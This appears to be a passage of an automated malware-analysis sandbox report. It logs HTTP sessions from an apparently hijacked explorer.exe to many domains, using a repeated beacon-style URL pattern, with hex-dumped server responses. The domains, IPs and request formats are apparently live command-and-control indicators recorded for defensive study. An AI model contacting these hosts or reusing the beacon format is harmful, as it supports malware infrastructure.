                                                                  Data Ascii: 1e04<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert(' .');f.agree.focus();return false;}if (f.customer_name.value == ""){alert(' .');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('
                                                                  Apr 12, 2021 10:03:45.601061106 CEST1450INData Raw: 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 6d 6f 62
                                                                  Data Ascii: .');f.customer_birth.focus();return false;}if (f.mobile.value.length < 10){alert(' .');f.mobile.focus();return false;}var tel_matches = ["", "", "", ""
                                                                  Apr 12, 2021 10:03:45.601099968 CEST1451INData Raw: 6e 20 6e 61 5f 6f 70 65 6e 5f 77 69 6e 64 6f 77 28 6e 61 6d 65 2c 20 75 72 6c 2c 20 6c 65 66 74 2c 20 74 6f 70 2c 20 77 69 64 74 68 2c 20 68 65 69 67 68 74 2c 20 74 6f 6f 6c 62 61 72 2c 20 6d 65 6e 75 62 61 72 2c 20 73 74 61 74 75 73 62 61 72 2c
                                                                  Data Ascii: n na_open_window(name, url, left, top, width, height, toolbar, menubar, statusbar, scrollbar, resizable){ toolbar_str = toolbar ? 'yes' : 'no'; menubar_str = menubar ? 'yes' : 'no'; statusbar_str = statusbar ? 'yes' : 'no'; scrollbar_
                                                                  Apr 12, 2021 10:03:45.601140976 CEST1452INData Raw: 20 74 72 75 65 2c 0a 20 20 20 20 6d 69 6e 53 6c 69 64 65 73 3a 31 30 2c 0a 20 20 20 20 6d 61 78 53 6c 69 64 65 73 3a 31 30 2c 0a 20 20 20 20 6d 6f 76 65 53 6c 69 64 65 73 3a 31 2c 0a 20 20 20 20 69 6e 66 69 6e 69 74 65 4c 6f 6f 70 3a 20 74 72 75
                                                                  Data Ascii: true, minSlides:10, maxSlides:10, moveSlides:1, infiniteLoop: true, autoHover: false, speed: 200, pause: 500, tickerHover:false, touchEnabled:false });});</script><link rel="stylesheet" href="/fr
                                                                  Apr 12, 2021 10:03:45.601180077 CEST1454INData Raw: 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 31 22 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 32 22 3e 0a 09
                                                                  Data Ascii: <input type="hidden" name="mobile1"><input type="hidden" name="mobile2"><input type="hidden" name="mobile3"><table class="tbl_form"><colgroup><col style="width:75px;"><col style=""><col st
                                                                  Apr 12, 2021 10:03:45.601217985 CEST1455INData Raw: 74 6f 6e 22 20 63 6c 61 73 73 3d 22 74 6f 70 49 6d 67 22 20 73 74 79 6c 65 3d 22 20 22 3e 3c 2f 62 75 74 74 6f 6e 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 3c 21 2d 2d 20 ea b0 80 ec 9e 85 eb a6 ac ec 8a a4 ed 8a b8 20 2d 2d 3e 0a 09 3c 64 69 76
                                                                  Data Ascii: ton" class="topImg" style=" "></button></form>... --><div class="real_insu_wrap"><div class="insu_list_area"><div id="realtime_calculation_list"><ul class="rolling"><li><span class="name_new">
                                                                  Apr 12, 2021 10:03:45.601258039 CEST1456INData Raw: 38 30 37 0d 0a 30 31 30 2d 4f 4f 4f 4f 2d 35 34 35 30 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 67 65 22 3e 3c 69 3e ec a0 91 ec 88 98 ec 99 84 eb a3 8c 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09
                                                                  Data Ascii: 807010-OOOO-5450</span><span class="age"><i></i></span></li><li><span class="name_new">**</span><span class="sex">010-OOOO-7547</span><span class="age"><i></i></span>
                                                                  Apr 12, 2021 10:03:45.601301908 CEST1457INData Raw: 3c 69 3e ec a0 91 ec 88 98 ec 99 84 eb a3 8c 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 3c 6c 69 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 6d 65 5f 6e 65 77 22 3e ea b0 95
                                                                  Data Ascii: <i></i></span></li><li><span class="name_new">**</span><span class="sex">010-OOOO-7822</span><span class="age"><i></i></span></li><li><span class="name_new">


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.74971881.17.18.19880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:50.758109093 CEST1488OUTGET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1
                                                                  Host: www.moretuantired.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:50.822356939 CEST1490INHTTP/1.1 200 OK
                                                                  cache-control: max-age=0, private, must-revalidate
                                                                  connection: close
                                                                  content-length: 584
                                                                  content-type: text/html; charset=utf-8
                                                                  date: Mon, 12 Apr 2021 08:03:50 GMT
                                                                  server: nginx
                                                                  set-cookie: sid=9de5d662-9b65-11eb-8f4c-2dd5d5311804; path=/; domain=.moretuantired.com; expires=Sat, 30 Apr 2089 11:17:57 GMT; max-age=2147483647; HttpOnly
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 72 65 74 75 61 6e 74 69 72 65 64 2e 63 6f 6d 2f 69 75 34 64 2f 3f 4a 36 41 3d 74 30 25 32 46 65 68 42 36 25 32 46 4c 56 76 48 59 55 31 30 53 70 51 47 42 68 55 47 72 69 6e 55 4f 65 61 76 33 51 71 4b 58 72 79 34 35 34 72 63 4d 69 74 25 32 46 35 72 6c 53 47 63 59 36 48 68 77 31 37 39 66 67 2b 57 55 56 37 73 38 53 47 67 25 33 44 25 33 44 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4f 44 49 79 4d 54 67 7a 4d 43 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 34 4d 6a 45 30 4e 6a 4d 77 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 48 46 6e 63 6a 68 6e 5a 6e 52 30 5a 58 4e 6d 4f 47 39 72 5a 57 4d 77 62 47 6c 6e 61 32 73 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 67 79 4d 54 51 32 4d 7a 41 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 34 4d 6a 45 30 4e 6a 4d 77 4f 44 45 79 4e 6a 6b 31 66 51 2e 47 2d 76 73 63 79 6f 68 65 79 38 6f 6e 30 39 4e 4a 62 42 68 35 70 33 39 77 6b 4a 68 64 31 78 70 41 5f 37 55 4d 68 42 30 55 61 77 26 73 69 64 3d 39 64 65 35 64 36 36 32 2d 39 62 36 35 2d 31 31 65 62 2d 38 66 34 63 2d 32 64 64 35 64 35 33 31 31 38 30 34 26 75 56 6a 4c 3d 4d 36 4e 48 70 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.moretuantired.com/iu4d/?J6A=t0%2FehB6%2FLVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit%2F5rlSGcY6Hhw179fg+WUV7s8SGg%3D%3D&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxODIyMTgzMCwiaWF0IjoxNjE4MjE0NjMwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycHFncjhnZnR0ZXNmOG9rZWMwbGlna2siLCJuYmYiOjE2MTgyMTQ2MzAsInRzIjoxNjE4MjE0NjMwODEyNjk1fQ.G-vscyohey8on09NJbBh5p39wkJhd1xpA_7UMhB0Uaw&sid=9de5d662-9b65-11eb-8f4c-2dd5d5311804&uVjL=M6NHp');</script></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.749719104.21.7.6780C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:55.992831945 CEST5275OUTGET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1
                                                                  Host: www.betbonusuk.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:56.058897972 CEST5276INHTTP/1.1 301 Moved Permanently
                                                                  Date: Mon, 12 Apr 2021 08:03:56 GMT
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=3600
                                                                  Expires: Mon, 12 Apr 2021 09:03:56 GMT
                                                                  Location: https://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ==
                                                                  cf-request-id: 0966b4e1fe00002c824a157000000001
                                                                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zksz97DotkzONKWrHGxfhMn0mjrpmB5IH3F2SIvN01qHstmEka6bp6V3jnPqP619zf4X3H%2BzftPL2h65voLtQveDO4QV0xGAnOUxmKXr2CvZh90%3D"}],"max_age":604800}
                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                  Server: cloudflare
                                                                  CF-RAY: 63eaf0e338e42c82-LHR
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.74972052.56.126.2680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:01.201181889 CEST5277OUTGET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1
                                                                  Host: www.weluvweb.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:01.253669024 CEST5278INHTTP/1.1 401 Unauthorized
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:04:01 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 172
                                                                  Connection: close
                                                                  WWW-Authenticate: Basic realm="Restricted Content"
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-XSS-Protection: 1; mode=block
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Content-Security-Policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval';
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>401 Authorization Required</title></head><body><center><h1>401 Authorization Required</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.7497213.13.255.15780C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:06.577115059 CEST5280OUTGET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1
                                                                  Host: www.warungjitu.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:06.714777946 CEST5280INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 12 Apr 2021 08:04:06 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 153
                                                                  Connection: close
                                                                  Server: nginx/1.16.1
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.74973452.206.71.22080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:17.254053116 CEST6138OUTGET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1
                                                                  Host: www.appearwood.club
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:17.381587029 CEST6158INHTTP/1.1 502 Bad Gateway
                                                                  Server: openresty/1.15.8.3
                                                                  Date: Mon, 12 Apr 2021 08:04:17 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 0
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.749735142.111.76.11880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:22.810084105 CEST6174OUTGET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1
                                                                  Host: www.theartsutra.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.749736172.67.130.4380C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:28.499571085 CEST6202OUTGET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1
                                                                  Host: www.chestfreezersale.xyz
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:28.859160900 CEST6203INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 12 Apr 2021 08:04:28 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: __cfduid=d539d58d2bef24b0ad4345217a6c1ca9c1618214668; expires=Wed, 12-May-21 08:04:28 GMT; path=/; domain=.chestfreezersale.xyz; HttpOnly; SameSite=Lax
                                                                  accept-ranges: bytes
                                                                  CF-Cache-Status: DYNAMIC
                                                                  cf-request-id: 0966b560fa000006b2230ea000000001
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sVWI7jUSxielKSjGjJx1VmKTHjQ2vbIlNcFeqq0CvvoL%2B%2FqGEalcFF%2FnzrvqTnYo%2Bw2aSzG8hdHANa2R9bPcDrVWOCkZIAVJINbJwHDmMt5DcCrCTeq89kY%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                  Server: cloudflare
                                                                  CF-RAY: 63eaf1ae5d2a06b2-LHR
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 32 39 61 30 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65
                                                                  Data Ascii: 29a0<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-he
                                                                  Apr 12, 2021 10:04:28.859213114 CEST6205INData Raw: 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32
                                                                  Data Ascii: ight: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0;
                                                                  Apr 12, 2021 10:04:28.859246016 CEST6206INData Raw: 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                  Data Ascii: ason-text { margin: 20px 0; font-size: 16px; } ul { display: inline-block; list-style: none outside none; margin: 0; padding: 0; } ul li {
                                                                  Apr 12, 2021 10:04:28.859287024 CEST6207INData Raw: 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20
                                                                  Data Ascii: ul li { width: 100%; text-align: left; } .additional-info-items ul li:first-child { padding: 20px; } .reason-text { font-size: 18p
                                                                  Apr 12, 2021 10:04:28.859333038 CEST6209INData Raw: 68 49 77 74 49 42 77 67 49 75 59 59 34 75 2f 2f 75 56 4a 32 71 70 4c 4b 44 37 51 38 74 32 5a 37 78 70 44 33 6e 36 73 6b 61 39 2f 32 62 4d 39 4d 76 7a 36 6f 47 45 79 58 46 6f 4b 48 66 6d 68 65 6f 65 77 78 39 63 59 65 68 56 75 50 48 4d 54 34 6a 70
                                                                  Data Ascii: hIwtIBwgIuYY4u//uVJ2qpLKD7Q8t2Z7xpD3n6ska9/2bM9Mvz6oGEyXFoKHfmheoewx9cYehVuPHMT4jphyBtNHxHQmDGgBvZjXBuWN2gogbPy6RtcOejNPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW
                                                                  Apr 12, 2021 10:04:28.859376907 CEST6210INData Raw: 43 67 41 65 44 6a 6c 61 4d 39 6b 74 41 44 30 2b 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f 44 48 4b 7a 66 4e 45 59 63 6b
                                                                  Data Ascii: CgAeDjlaM9ktAD0+Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0L
                                                                  Apr 12, 2021 10:04:28.859422922 CEST6212INData Raw: 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59 55 43 37 55 56 32 4a 6f 70 37 58
                                                                  Data Ascii: S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfq
                                                                  Apr 12, 2021 10:04:28.859467983 CEST6213INData Raw: 73 2d 72 65 61 73 6f 6e 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6e
                                                                  Data Ascii: s-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.chestfreezersale.xyz's <a href="/cdn-cgi/l/email-protection#83ebecf0f7eaede4aeedecf7eae5eae0e
                                                                  Apr 12, 2021 10:04:28.859505892 CEST6214INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61
                                                                  Data Ascii: </div> </li> <li class="info-server"></li> </ul> </div> </div> </section> <footer> <div class="container"


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.749741192.0.78.2580C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:50.410053968 CEST6232OUTGET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1
                                                                  Host: www.emmajanetracy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:50.450371027 CEST6233INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:04:50 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                                                  X-ac: 2.hhn _dfw
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Code Manipulations

